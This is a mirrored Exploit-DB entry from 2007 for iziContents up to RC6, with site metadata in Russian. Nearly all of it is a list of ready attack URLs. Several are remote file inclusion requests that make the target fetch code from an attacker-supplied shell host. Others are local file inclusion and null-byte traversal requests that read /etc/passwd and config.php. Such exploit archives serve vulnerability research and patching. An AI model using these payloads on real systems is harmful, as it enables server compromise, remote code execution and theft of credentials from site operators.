- 34,644
- 0
- 18 Дек 2022
- EDB-ID
- 4441
- Проверка EDB
-
- Пройдено
- Автор
- IRK4Z
- Тип уязвимости
- WEBAPPS
- Платформа
- PHP
- CVE
- cve-2007-5055 cve-2007-5054 cve-2007-5053 cve-2005-4600
- Дата публикации
- 2007-09-21
Код:
# o [bug] /"*._ _ #
# . . . .-*'` `*-.._.-'/ #
# o o < * )) , ( #
# . o `*-._`._(__.--*"`.\ #
# #
# vuln.: iziContents <= RC6 (RFI/LFI) Multiple Remote Vulnerabilities #
# author: [email protected] #
# download: #
# http://www.izicontents.com/download/iziContents1RC6.zip #
# #
# greetz: cOndemned, kacper ;> #
# remote file inclusion:
http://[site]/[path]/modules/search/search.php?language_home=&rootdp=zZz&gsLanguage=http://[shell]?
http://[site]/[path]/modules/poll/inlinepoll.php?language_home=&rootdp=zZz&gsLanguage=http://[shell]?
http://[site]/[path]/modules/poll/showpoll.php?language_home=&rootdp=zZz&gsLanguage=http://[shell]?
http://[site]/[path]/modules/links/showlinks.php?language_home=&rootdp=zZz&gsLanguage=http://[shell]?
http://[site]/[path]/modules/links/submit_links.php?rootdp=zZz&gsLanguage=http://[shell]?
# local file inclusion:
http://[site]/[path]/modules/poll/poll_summary.php?rootdp=zZz&admin_home=/etc/passwd%00
http://[site]/[path]/include/db.php?rootdp=/etc/passwd%00
# remote file disclosure:
http://[site]/[path]/include/tinymce/tiny_mce_gzip.php?theme=../../config.php%00
# milw0rm.com [2007-09-21]- Источник
- www.exploit-db.com
